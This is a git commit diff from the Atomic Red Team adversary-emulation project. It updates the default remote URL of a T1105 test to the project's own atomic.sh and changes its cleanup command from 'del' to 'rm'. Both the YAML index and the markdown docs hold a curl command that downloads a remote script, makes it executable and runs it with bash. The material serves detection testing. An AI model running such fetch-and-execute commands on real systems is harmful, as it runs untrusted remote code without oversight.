Generated docs from job=generate-docs branch=master [ci skip]

This commit is contained in:
Atomic Red Team doc generator
2023-01-04 03:24:07 +00:00
parent b0b413cc9d
commit 703af1c830
2 changed files with 4 additions and 4 deletions
+2 -2
View File
@@ -95814,7 +95814,7 @@ command-and-control:
remote_url:
description: url of remote payload
type: string
default: https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/
default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh
payload_name:
description: payload name
type: string
@@ -95823,7 +95823,7 @@ command-and-control:
command: 'curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name}
'
cleanup_command: 'del #{payload_name}
cleanup_command: 'rm #{payload_name}
'
name: sh
+2 -2
View File
@@ -1231,7 +1231,7 @@ Utilize linux Curl to download a remote file, chmod +x it and run it.
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_url | url of remote payload | string | https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1105/src/|
| remote_url | url of remote payload | string | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1105/src/atomic.sh|
| payload_name | payload name | string | atomic.sh|
@@ -1244,7 +1244,7 @@ curl -sO #{remote_url}; chmod +x #{payload_name} | bash #{payload_name}
#### Cleanup Commands:
```sh
del #{payload_name}
rm #{payload_name}
```